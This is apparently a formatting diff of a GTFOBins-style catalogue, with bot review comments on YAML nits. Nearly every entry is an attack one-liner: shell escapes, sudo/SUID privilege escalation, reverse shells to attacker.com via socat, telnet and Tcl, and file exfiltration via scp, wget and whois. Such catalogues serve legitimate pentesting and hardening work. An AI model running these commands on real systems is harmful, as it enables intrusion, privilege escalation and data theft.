@@ -1,36 +1,36 @@ --- functions: execute-non-interactive: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - scp -S $TF x y: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + scp -S $TF x y: upload: - - description: Send local file to a SSH server. - code: | - RPATH=user@attacker.com:~/file_to_save - LPATH=file_to_send - scp $LFILE $RPATH + - description: Send local file to a SSH server. + code: | + RPATH=user@attacker.com:~/file_to_save + LPATH=file_to_send + scp $LFILE $RPATH download: - - description: Fetch a remote file from a SSH server. - code: | - RPATH=user@attacker.com:~/file_to_get - LFILE=file_to_save - scp $RPATH $LFILE + - description: Fetch a remote file from a SSH server. + code: | + RPATH=user@attacker.com:~/file_to_get + LFILE=file_to_save + scp $RPATH $LFILE sudo-enabled: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - sudo scp -S $TF x y: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + sudo scp -S $TF x y: suid-limited: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - ./scp -S $TF a b: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + ./scp -S $TF a b: --- diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index 0cd0df4..987e56e 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md 
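Review bot: The `upload` entry on the new side still assigns `LPATH=file_to_send` while the command line reads `$LFILE`, so the variable the command expands is never set and the reindent carries the mismatch forward. Rename the assignment to `LFILE=file_to_send` so it agrees with the `download` entry directly below it, which already pairs `LFILE=` with `$LFILE`. As a smaller nit in the same file, the three `-S $TF` invocations leave `$TF` unquoted although the preceding `echo`/`chmod` lines quote `"$TF"`; quoting it consistently would keep the snippets uniform.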
@@ -1,24 +1,24 @@ --- functions: execute-interactive: - - description: GNU version only. Also, this requires `bash`. - code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + - description: GNU version only. Also, this requires `bash`. + code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts execute-non-interactive: - - description: GNU version only. - code: sed -n "1e id" /etc/hosts + - description: GNU version only. + code: sed -n "1e id" /etc/hosts file-write: - - code: | - LFILE=file_to_write - sed -n "1s/.*/data/w $LFILE" /etc/hosts + - code: | + LFILE=file_to_write + sed -n "1s/.*/data/w $LFILE" /etc/hosts file-read: - - code: | - LFILE=file_to_read - sed '' "$LFILE" + - code: | + LFILE=file_to_read + sed '' "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./sed -e '' "$LFILE" + - code: | + LFILE=file_to_read + ./sed -e '' "$LFILE" sudo-enabled: - - description: GNU version only. Also, this requires `bash`. - code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + - description: GNU version only. Also, this requires `bash`. + code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts --- diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md index cdc0aed..50ce9b2 100644 --- a/_gtfobins/setarch.md +++ b/_gtfobins/setarch.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: setarch $(arch) /bin/sh + - code: setarch $(arch) /bin/sh suid-enabled: - - code: "./setarch $(arch) /bin/sh -p" + - code: ./setarch $(arch) /bin/sh -p sudo-enabled: - - code: sudo setarch $(arch) /bin/sh + - code: sudo setarch $(arch) /bin/sh --- diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md index 743b96f..17d8fe4 100644 --- a/_gtfobins/sftp.md +++ b/_gtfobins/sftp.md 
@@ -1,25 +1,25 @@ --- functions: execute-interactive: - - code: | - HOST=user@attacker.com - sftp $HOST - !/bin/sh + - code: | + HOST=user@attacker.com + sftp $HOST + !/bin/sh upload: - - description: Send local file to a SSH server. - code: | - RHOST=user@attacker.com - sftp $RHOST - put file_to_send file_to_save + - description: Send local file to a SSH server. + code: | + RHOST=user@attacker.com + sftp $RHOST + put file_to_send file_to_save download: - - description: Fetch a remote file from a SSH server. - code: | - RHOST=user@attacker.com - sftp $RHOST - get file_to_get file_to_save + - description: Fetch a remote file from a SSH server. + code: | + RHOST=user@attacker.com + sftp $RHOST + get file_to_get file_to_save sudo-enabled: - - code: | - HOST=user@attacker.com - sudo sftp $HOST - !/bin/sh + - code: | + HOST=user@attacker.com + sudo sftp $HOST + !/bin/sh --- diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md index 924ea0e..eedba39 100644 --- a/_gtfobins/shuf.md +++ b/_gtfobins/shuf.md @@ -2,16 +2,16 @@ description: The read file content is corrupted by adding a newline. functions: file-write: - - code: | - LFILE=file_to_write - shuf -e data -o "$LFILE" + - code: | + LFILE=file_to_write + shuf -e data -o "$LFILE" suid-enabled: - - description: - code: | - LFILE=file_to_write - ./shuf -e data -o "$LFILE" - sudo-enabled: - - code: | - LFILE=file_to_write - sudo shuf -e data -o "$LFILE" + - description: + code: | + LFILE=file_to_write + ./shuf -e data -o "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_write + sudo shuf -e data -o "$LFILE" --- diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index dc524ff..2e84b46 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md 
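Review bot: In the `shuf.md` hunk the `description:` key under `suid-enabled` is kept with no value on the new side, so it parses as YAML null rather than a string, which is presumably not what the page template expects; the sibling `file-write` and `sudo-enabled` entries simply omit the key, so drop the `- description:` line and let `- code: |` start the list item (or give it real text). Because the diff lines are collapsed in this view, the indentation of the reindented `sudo-enabled:` key cannot be confirmed; it has to sit at the same level as `suid-enabled:`, otherwise it is absorbed into the previous list item and the entry silently disappears.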
@@ -1,16 +1,14 @@ --- functions: reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on - the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane bind-shell-interactive: - - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 - on the attacker box to connect to the shell. - code: | - LPORT=12345 - socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane + - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell. + code: | + LPORT=12345 + socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane --- diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md index 42f8b2c..a352a5c 100644 --- a/_gtfobins/sort.md +++ b/_gtfobins/sort.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - sort -m "$LFILE" + - code: | + LFILE=file_to_read + sort -m "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./sort -m "$LFILE" + - code: | + LFILE=file_to_read + ./sort -m "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo sort -m "$LFILE" + - code: | + LFILE=file_to_read + sudo sort -m "$LFILE" --- diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md index 5b4f1f2..180edda 100644 --- a/_gtfobins/sqlite3.md +++ b/_gtfobins/sqlite3.md 
@@ -1,21 +1,21 @@ --- functions: execute-interactive: - - code: sqlite3 /dev/null '.shell /bin/sh' + - code: sqlite3 /dev/null '.shell /bin/sh' file-write: - - code: | - LFILE=file_to_write - sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' + - code: | + LFILE=file_to_write + sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' file-read: - - code: | - LFILE=file_to_read - sqlite3 << EOF - CREATE TABLE t(line TEXT); - .import $LFILE t - SELECT * FROM t; - EOF + - code: | + LFILE=file_to_read + sqlite3 << EOF + CREATE TABLE t(line TEXT); + .import $LFILE t + SELECT * FROM t; + EOF sudo-enabled: - - code: sudo sqlite3 /dev/null '.shell /bin/sh' + - code: sudo sqlite3 /dev/null '.shell /bin/sh' suid-limited: - - code: "./sqlite3 /dev/null '.shell /bin/sh'" + - code: "./sqlite3 /dev/null '.shell /bin/sh'" --- diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index bd3a290..24fe52e 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md 
@@ -1,32 +1,30 @@ --- functions: execute-interactive: - - description: Reconnecting may help bypassing restricted shells. - code: ssh localhost $SHELL --noprofile --norc - - description: Spawn interactive shell through ProxyCommand option. - code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" - x + - description: Reconnecting may help bypassing restricted shells. + code: ssh localhost $SHELL --noprofile --norc + - description: Spawn interactive shell through ProxyCommand option. + code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x upload: - - description: Send local file to a SSH server. - code: | - HOST=user@attacker.com - RPATH=file_to_save - LPATH=file_to_send - ssh $HOST "cat > $RPATH" < $LPATH + - description: Send local file to a SSH server. + code: | + HOST=user@attacker.com + RPATH=file_to_save + LPATH=file_to_send + ssh $HOST "cat > $RPATH" < $LPATH download: - - description: Fetch a remote file from a SSH server. - code: | - HOST=user@attacker.com - RPATH=file_to_get - LPATH=file_to_save - ssh $HOST "cat $RPATH" > $LPATH + - description: Fetch a remote file from a SSH server. + code: | + HOST=user@attacker.com + RPATH=file_to_get + LPATH=file_to_save + ssh $HOST "cat $RPATH" > $LPATH file-read: - - description: The read file content is corrupted by error prints. - code: | - LFILE=file_to_read - ssh -F $LFILE localhost + - description: The read file content is corrupted by error prints. + code: | + LFILE=file_to_read + ssh -F $LFILE localhost sudo-enabled: - - description: Spawn interactive root shell through ProxyCommand option. - code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh - -i'" x + - description: Spawn interactive root shell through ProxyCommand option. + code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x --- diff --git a/_gtfobins/stdbuf.md b/_gtfobins/stdbuf.md index c0e4181..24977b8 100644 --- a/_gtfobins/stdbuf.md 
+++ b/_gtfobins/stdbuf.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: stdbuf -i0 /bin/sh + - code: stdbuf -i0 /bin/sh suid-enabled: - - code: "./stdbuf -i0 /bin/sh -p" + - code: ./stdbuf -i0 /bin/sh -p sudo-enabled: - - code: sudo stdbuf -i0 /bin/sh + - code: sudo stdbuf -i0 /bin/sh --- diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md index 2302f19..18cfdb0 100644 --- a/_gtfobins/strace.md +++ b/_gtfobins/strace.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: strace -o /dev/null /bin/sh + - code: strace -o /dev/null /bin/sh suid-enabled: - - code: "./strace -o /dev/null /bin/sh -p" + - code: ./strace -o /dev/null /bin/sh -p sudo-enabled: - - code: sudo strace -o /dev/null /bin/sh + - code: sudo strace -o /dev/null /bin/sh --- diff --git a/_gtfobins/tail.md b/_gtfobins/tail.md index f7090f1..0235e3a 100644 --- a/_gtfobins/tail.md +++ b/_gtfobins/tail.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - tail -c1G "$LFILE" + - code: | + LFILE=file_to_read + tail -c1G "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./tail -c1G "$LFILE" + - code: | + LFILE=file_to_read + ./tail -c1G "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo tail -c1G "$LFILE" + - code: | + LFILE=file_to_read + sudo tail -c1G "$LFILE" --- diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md index 01afeef..73491e6 100644 --- a/_gtfobins/tar.md +++ b/_gtfobins/tar.md 
@@ -1,24 +1,24 @@ --- functions: execute-interactive: - - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh execute-non-interactive: - - description: This only works for GNU tar. - code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' + - description: This only works for GNU tar. + code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' file-write: - - description: This only works for GNU tar. - code: | - LFILE=file_to_write - TF=$(mktemp) - echo data > "$TF" - tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P + - description: This only works for GNU tar. + code: | + LFILE=file_to_write + TF=$(mktemp) + echo data > "$TF" + tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P file-read: - - description: This only works for GNU tar. - code: | - LFILE=file_to_read - tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' + - description: This only works for GNU tar. + code: | + LFILE=file_to_read + tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' sudo-enabled: - - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh suid-limited: - - code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" + - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh --- diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md index 7c90197..4f3d474 100644 --- a/_gtfobins/taskset.md +++ b/_gtfobins/taskset.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: taskset 1 /bin/sh + - code: taskset 1 /bin/sh suid-enabled: - - code: "./taskset 1 /bin/sh -p" + - code: ./taskset 1 /bin/sh -p sudo-enabled: - - code: sudo taskset 1 /bin/sh + - code: sudo taskset 1 /bin/sh --- diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md index 582cd12..db81e7f 100644 --- a/_gtfobins/tclsh.md +++ b/_gtfobins/tclsh.md 
@@ -1,21 +1,21 @@ --- functions: execute-interactive: - - code: | - tclsh - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh suid-enabled: - - code: | - ./tclsh - exec /bin/sh -p <@stdin >@stdout 2>@stderr + - code: | + ./tclsh + exec /bin/sh -p <@stdin >@stdout 2>@stderr sudo-enabled: - - code: | - sudo tclsh - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + sudo tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr --- diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md index a10c8c7..9dca238 100644 --- a/_gtfobins/tee.md +++ b/_gtfobins/tee.md @@ -1,18 +1,16 @@ --- -description: 'It can only append data if the destination exists. - -' +description: It can only append data if the destination exists. functions: file-write: - - code: | - LFILE=file_to_write - echo data | ./tee -a "$LFILE" + - code: | + LFILE=file_to_write + echo data | ./tee -a "$LFILE" suid-enabled: - - code: | - LFILE=file_to_write - echo data | ./tee -a "$LFILE" + - code: | + LFILE=file_to_write + echo data | ./tee -a "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_write - echo data | sudo tee -a "$LFILE" + - code: | + LFILE=file_to_write + echo data | sudo tee -a "$LFILE" --- 
diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md index e237c64..35a53cd 100644 --- a/_gtfobins/telnet.md +++ b/_gtfobins/telnet.md @@ -1,35 +1,35 @@ --- functions: execute-interactive: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - telnet $RHOST $RPORT - ^] - !/bin/sh + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + telnet $RHOST $RPORT + ^] + !/bin/sh reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - TF=$(mktemp) - rm $TF - mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + TF=$(mktemp) + rm $TF + mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF sudo-enabled: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - sudo telnet $RHOST $RPORT - ^] - !/bin/sh + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + sudo telnet $RHOST $RPORT + ^] + !/bin/sh suid-limited: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - ./telnet $RHOST $RPORT - ^] - !/bin/sh + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + ./telnet $RHOST $RPORT + ^] + !/bin/sh --- diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md index 173edd6..f391860 100644 --- a/_gtfobins/tftp.md +++ b/_gtfobins/tftp.md 
@@ -1,15 +1,15 @@ --- functions: upload: - - description: Send local file to a TFTP server. - code: | - RHOST=attacker.com - tftp $RHOST - put file_to_send + - description: Send local file to a TFTP server. + code: | + RHOST=attacker.com + tftp $RHOST + put file_to_send download: - - description: Fetch a remote file from a TFTP server. - code: | - RHOST=attacker.com - tftp $RHOST - get file_to_get + - description: Fetch a remote file from a TFTP server. + code: | + RHOST=attacker.com + tftp $RHOST + get file_to_get --- diff --git a/_gtfobins/time.md b/_gtfobins/time.md index 97c4be1..2434124 100644 --- a/_gtfobins/time.md +++ b/_gtfobins/time.md @@ -1,12 +1,10 @@ --- -description: | - Note that the shell might have its own builtin time implementation, which may - behave differently than` /usr/bin/time`, hence the absolute path. +description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path. functions: execute-interactive: - - code: "/usr/bin/time /bin/sh" + - code: /usr/bin/time /bin/sh suid-enabled: - - code: "./time /bin/sh -p" + - code: ./time /bin/sh -p sudo-enabled: - - code: sudo /usr/bin/time /bin/sh + - code: sudo /usr/bin/time /bin/sh --- diff --git a/_gtfobins/timeout.md b/_gtfobins/timeout.md index 6a4742a..565e594 100644 --- a/_gtfobins/timeout.md +++ b/_gtfobins/timeout.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: timeout 7d /bin/sh + - code: timeout 7d /bin/sh suid-enabled: - - code: "./timeout 7d /bin/sh -p" + - code: ./timeout 7d /bin/sh -p sudo-enabled: - - code: sudo timeout --foreground 7d /bin/sh + - code: sudo timeout --foreground 7d /bin/sh --- diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md index 6da459d..06462f9 100644 --- a/_gtfobins/ul.md +++ b/_gtfobins/ul.md 
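Review bot: The rejoined `description:` line in the time.md hunk carries over a misplaced backtick: it reads "behave differently than` /usr/bin/time`", so the opening backtick precedes the space and the rendered code span covers " /usr/bin/time" with a stray backtick glued to "than". Since this commit rewrites the whole scalar anyway, the fix is to move the backtick one character to the right, giving "behave differently than `/usr/bin/time`, hence the absolute path." The rest of the time.md hunk is a whitespace and quoting change only.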
@@ -1,18 +1,16 @@ --- -description: | - The read file content is corrupted by replacing occurrences of `$'\b_'` to - terminal sequences and by converting tabs to spaces. +description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces. functions: file-read: - - code: | - LFILE=file_to_read - ul "$LFILE" + - code: | + LFILE=file_to_read + ul "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./ul "$LFILE" + - code: | + LFILE=file_to_read + ./ul "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo ul "$LFILE" + - code: | + LFILE=file_to_read + sudo ul "$LFILE" --- diff --git a/_gtfobins/unexpand.md b/_gtfobins/unexpand.md index 601ea73..67efcb3 100644 --- a/_gtfobins/unexpand.md +++ b/_gtfobins/unexpand.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - unexpand -t99999999 "$LFILE" + - code: | + LFILE=file_to_read + unexpand -t99999999 "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./unexpand -t99999999 "$LFILE" + - code: | + LFILE=file_to_read + ./unexpand -t99999999 "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo unexpand -t99999999 "$LFILE" + - code: | + LFILE=file_to_read + sudo unexpand -t99999999 "$LFILE" --- diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md index d2208d6..04cfdc5 100644 --- a/_gtfobins/uniq.md +++ b/_gtfobins/uniq.md @@ -1,18 +1,16 @@ --- -description: 'The read file content is corrupted by squashing multiple adjacent lines. - -' +description: The read file content is corrupted by squashing multiple adjacent lines. functions: file-read: - - code: | - LFILE=file_to_read - uniq "$LFILE" + - code: | + LFILE=file_to_read + uniq "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./uniq "$LFILE" + - code: | + LFILE=file_to_read + ./uniq "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo uniq "$LFILE" + - code: | + LFILE=file_to_read + sudo uniq "$LFILE" --- 
diff --git a/_gtfobins/unshare.md b/_gtfobins/unshare.md index 222cac2..e0396bb 100644 --- a/_gtfobins/unshare.md +++ b/_gtfobins/unshare.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: unshare /bin/sh + - code: unshare /bin/sh suid-enabled: - - code: "./unshare -r /bin/sh" + - code: ./unshare -r /bin/sh sudo-enabled: - - code: sudo unshare /bin/sh + - code: sudo unshare /bin/sh --- diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md index a6849d1..d5c6a77 100644 --- a/_gtfobins/vi.md +++ b/_gtfobins/vi.md @@ -1,21 +1,19 @@ --- functions: execute-interactive: - - code: vi -c ':!/bin/sh' - - code: | - vi - :set shell=/bin/sh - :shell + - code: vi -c ':!/bin/sh' + - code: | + vi + :set shell=/bin/sh + :shell file-write: - - code: | - vi file_to_write - w + - code: | + vi file_to_write + w file-read: - - code: 'vi file_to_read - -' + - code: vi file_to_read suid-enabled: - - code: "./vi -c ':!/bin/sh -p'" + - code: ./vi -c ':!/bin/sh -p' sudo-enabled: - - code: sudo vi -c ':!/bin/sh' + - code: sudo vi -c ':!/bin/sh' --- diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md index dc8fd22..06b5fbb 100644 --- a/_gtfobins/watch.md +++ b/_gtfobins/watch.md @@ -1,12 +1,12 @@ --- functions: execute-non-interactive: - - code: watch /usr/bin/id + - code: watch /usr/bin/id suid-enabled: - - description: This keeps the SUID privileges only if the `-x` option is present. - code: "./watch -x /usr/bin/id" + - description: This keeps the SUID privileges only if the `-x` option is present. + code: ./watch -x /usr/bin/id sudo-enabled: - - code: sudo watch /usr/bin/id + - code: sudo watch /usr/bin/id suid-limited: - - code: "./watch /usr/bin/id" + - code: ./watch /usr/bin/id --- diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index 16ccf00..1c141e6 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md 
@@ -1,16 +1,15 @@ --- functions: upload: - - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. - Run an HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL + - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - wget $URL -O $LFILE + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + wget $URL -O $LFILE --- diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md index 71bffd9..f0e0d21 100644 --- a/_gtfobins/whois.md +++ b/_gtfobins/whois.md 
@@ -1,37 +1,31 @@ --- -description: "`whois` hangs waiting for the remote peer to close the socket.\n" +description: | + `whois` hangs waiting for the remote peer to close the socket. functions: upload: - - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` - and its length is limited by the maximum size of arguments. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - whois -h $RHOST -p $RPORT "`cat $LFILE`" - - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' - | base64 -d > "file_to_save"` on the attacker box to collect the file. The file - length is limited by the maximum size of arguments. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - whois -h $RHOST -p $RPORT "`base64 $LFILE`" + - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + whois -h $RHOST -p $RPORT "`cat $LFILE`" + - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + whois -h $RHOST -p $RPORT "`base64 $LFILE`" download: - - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 - < "file_to_send"` on the attacker box to send the file. The file has instances - of `$'\x0d'` stripped. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_save - whois -h $RHOST -p $RPORT > "$LFILE" - - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" - | nc -l -p 12345` on the attacker box to send the file. 
- code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_save - whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" + - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_save + whois -h $RHOST -p $RPORT > "$LFILE" + - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_save + whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" --- diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md index e495e28..47fdba1 100644 --- a/_gtfobins/wish.md +++ b/_gtfobins/wish.md @@ -1,17 +1,17 @@ --- functions: execute-interactive: - - code: | - wish - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + wish + exec /bin/sh <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish sudo-enabled: - - code: | - sudo wish - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + sudo wish + exec /bin/sh <@stdin >@stdout 2>@stderr --- diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md index a38ac2e..5a15f74 100644 --- a/_gtfobins/xargs.md +++ b/_gtfobins/xargs.md 
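Review bot: The whois.md hunk converts the top-level `description:` into a literal block scalar (`description: |`), which keeps the trailing newline the old double-quoted scalar ended with, whereas the same commit rewrites the equivalent single-line descriptions in tee.md, time.md, ul.md and uniq.md as plain scalars that drop it. The two forms yield different string values for the same kind of field, which the templates may or may not care about; if the trailing newline is not significant, writing whois.md's description as a plain scalar like the other four files would keep the data uniform, and if it is significant, the other four files are now the inconsistent ones. The whois hunk begins on the previous line of this chunk.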
